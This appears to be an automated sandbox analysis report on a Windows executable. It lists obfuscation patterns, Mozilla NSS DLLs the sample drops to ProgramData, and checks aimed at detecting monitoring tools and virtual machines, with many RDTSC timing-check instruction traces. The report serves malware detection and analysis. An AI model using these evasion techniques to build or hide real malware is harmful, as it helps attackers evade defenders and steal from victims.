Code function: 0_2_00339860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00339860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1cd111 should be: 0x1c01ff

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: xfniszhi
Source: file.exe	Static PE information: section name: punnpugg
Source: file.exe	Static PE information: section name: .taggant
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0033B035 push ecx; ret	0_2_0033B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00782069 push 4565510Bh; mov dword ptr [esp], ebp	0_2_007823DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0075885D push edi; mov dword ptr [esp], ebp	0_2_0075886D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B00B2 push 3C8B9F55h; mov dword ptr [esp], esi	0_2_009B00E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B00B2 push edx; mov dword ptr [esp], ecx	0_2_009B0126
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B00B2 push 42D77001h; mov dword ptr [esp], ebp	0_2_009B0136
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C283C push 2824E70Dh; mov dword ptr [esp], ebx	0_2_007C2848
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C283C push ebp; mov dword ptr [esp], ecx	0_2_007C299A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0078C83D push 7B7486A5h; mov dword ptr [esp], ebp	0_2_0078C87D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F6039 push ebp; mov dword ptr [esp], 56FA210Dh	0_2_007F603E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F6039 push ecx; mov dword ptr [esp], ebx	0_2_007F6867
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D0833 push edx; mov dword ptr [esp], 37B1545Ch	0_2_007D0859
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D0833 push edx; mov dword ptr [esp], 6778BBFAh	0_2_007D08BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D0833 push 7287BFFCh; mov dword ptr [esp], ecx	0_2_007D0900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 53BFF500h; mov dword ptr [esp], eax	0_2_006EE8B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 174B831Ah; mov dword ptr [esp], ebp	0_2_006EE902
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push edi; mov dword ptr [esp], ebx	0_2_006EE94D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 15F93EB6h; mov dword ptr [esp], ecx	0_2_006EEA0D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 0F748FBBh; mov dword ptr [esp], edi	0_2_006EEAA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push ecx; mov dword ptr [esp], 7D3A7F00h	0_2_006EEB1A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push ebx; mov dword ptr [esp], 791CB8E2h	0_2_006EEBC7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push ebx; mov dword ptr [esp], ecx	0_2_006EEBF3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 5EBB397Ah; mov dword ptr [esp], ecx	0_2_006EEC47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push ebp; mov dword ptr [esp], 3F7B2691h	0_2_006EEC6C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 31665200h; mov dword ptr [esp], edi	0_2_006EEC79
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push esi; mov dword ptr [esp], edx	0_2_006EECB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 1A59B77Dh; mov dword ptr [esp], edx	0_2_006EEE3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push 78BA80C3h; mov dword ptr [esp], ecx	0_2_006EEE42
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push ecx; mov dword ptr [esp], edx	0_2_006EEE62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push edi; mov dword ptr [esp], 74E314B2h	0_2_006EEE84
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE839 push eax; mov dword ptr [esp], esi	0_2_006EEEE1

Source: file.exe

Static PE information: section name: xfniszhi entropy: 7.953005680311224

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00339860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 581AB0 second address: 581ACD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36EC8543C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d jne 00007F36EC8543CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FBBC4 second address: 6FBBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FBBCA second address: 6FBBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EFF03 second address: 6EFF09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EFF09 second address: 6EFF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F36EC8543C6h 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F36EC8543C6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EFF25 second address: 6EFF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EFF29 second address: 6EFF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FAF04 second address: 6FAF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FAF08 second address: 6FAF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FAF14 second address: 6FAF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FB1CD second address: 6FB1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FB1D2 second address: 6FB1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FB1D8 second address: 6FB1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FB1DC second address: 6FB1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F36ED361E12h 0x0000000e jno 00007F36ED361E06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FB30F second address: 6FB315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF125 second address: 6FF134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF134 second address: 6FF138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF138 second address: 6FF13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF200 second address: 6FF205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF205 second address: 6FF239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F36ED361E0Ch 0x0000000f nop 0x00000010 pushad 0x00000011 mov edi, dword ptr [ebp+122D28E1h] 0x00000017 mov eax, ebx 0x00000019 popad 0x0000001a push 00000000h 0x0000001c mov edi, edx 0x0000001e push 673B5B0Ch 0x00000023 pushad 0x00000024 pushad 0x00000025 jl 00007F36ED361E06h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF239 second address: 6FF2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F36EC8543D7h 0x0000000a popad 0x0000000b xor dword ptr [esp], 673B5B8Ch 0x00000012 mov dword ptr [ebp+122D2CEAh], ebx 0x00000018 push 00000003h 0x0000001a jc 00007F36EC8543CCh 0x00000020 sub edi, dword ptr [ebp+122D2EBAh] 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F36EC8543C8h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 jmp 00007F36EC8543D0h 0x00000047 push 00000003h 0x00000049 mov dword ptr [ebp+122D1A53h], eax 0x0000004f cmc 0x00000050 push 4AFA01CEh 0x00000055 push eax 0x00000056 push edx 0x00000057 jp 00007F36EC8543CCh 0x0000005d js 00007F36EC8543C6h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF36D second address: 6FF377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F36ED361E06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF377 second address: 6FF42E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d jmp 00007F36EC8543D7h 0x00000012 pop esi 0x00000013 nop 0x00000014 mov si, A250h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F36EC8543D6h 0x00000020 mov dword ptr [ebp+122D17F4h], edx 0x00000026 pop edx 0x00000027 pop esi 0x00000028 push 1E6A8A21h 0x0000002d jo 00007F36EC8543CCh 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 xor dword ptr [esp], 1E6A8AA1h 0x00000040 mov esi, dword ptr [ebp+122D2C87h] 0x00000046 mov dword ptr [ebp+122D30C3h], eax 0x0000004c push 00000003h 0x0000004e mov dword ptr [ebp+122DB684h], edx 0x00000054 push 00000000h 0x00000056 xor dword ptr [ebp+122D1A4Eh], ebx 0x0000005c push 00000003h 0x0000005e mov dx, D3BAh 0x00000062 call 00007F36EC8543C9h 0x00000067 pushad 0x00000068 jne 00007F36EC8543C8h 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F36EC8543CBh 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF42E second address: 6FF47B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 ja 00007F36ED361E1Dh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnl 00007F36ED361E1Ch 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF47B second address: 6FF48F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF48F second address: 6FF4C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F36ED361E0Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F36ED361E11h 0x00000018 jg 00007F36ED361E06h 0x0000001e popad 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF4C3 second address: 6FF4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop eax 0x00000007 xor ecx, 1CE080AEh 0x0000000d lea ebx, dword ptr [ebp+12450F21h] 0x00000013 clc 0x00000014 xchg eax, ebx 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F36EC8543D3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF4EE second address: 6FF4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71E61B second address: 71E61F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C689 second address: 71C6A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36ED361E16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C6A4 second address: 71C6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F36EC8543CCh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C6BC second address: 71C6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F36ED361E06h 0x0000000a pop esi 0x0000000b push ebx 0x0000000c jnc 00007F36ED361E06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C6D0 second address: 71C6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C810 second address: 71C828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F36ED361E0Bh 0x0000000a js 00007F36ED361E12h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71CC5D second address: 71CC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71CC76 second address: 71CC84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F36ED361E06h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71CF88 second address: 71CF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71D23F second address: 71D245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7125D0 second address: 7125F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F36EC8543C6h 0x00000010 jmp 00007F36EC8543CDh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7125F7 second address: 7125FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7125FC second address: 712602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71E1AC second address: 71E1B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71E1B2 second address: 71E1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e ja 00007F36EC8543F6h 0x00000014 jmp 00007F36EC8543D9h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F36EC8543CFh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722EB4 second address: 722EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72ADBE second address: 72ADEC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F36EC8543D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F36EC8543C8h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72ADEC second address: 72ADF4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72ADF4 second address: 72ADF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72A33E second address: 72A353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F36ED361E0Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72A952 second address: 72A96A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F36EC8543C8h 0x0000000e jns 00007F36EC8543CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72A96A second address: 72A96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72AC45 second address: 72AC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72AC4E second address: 72AC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72AC54 second address: 72AC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72AC5A second address: 72AC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72C483 second address: 72C491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543CAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F687 second address: 72F68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F68B second address: 72F695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F71E second address: 72F722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
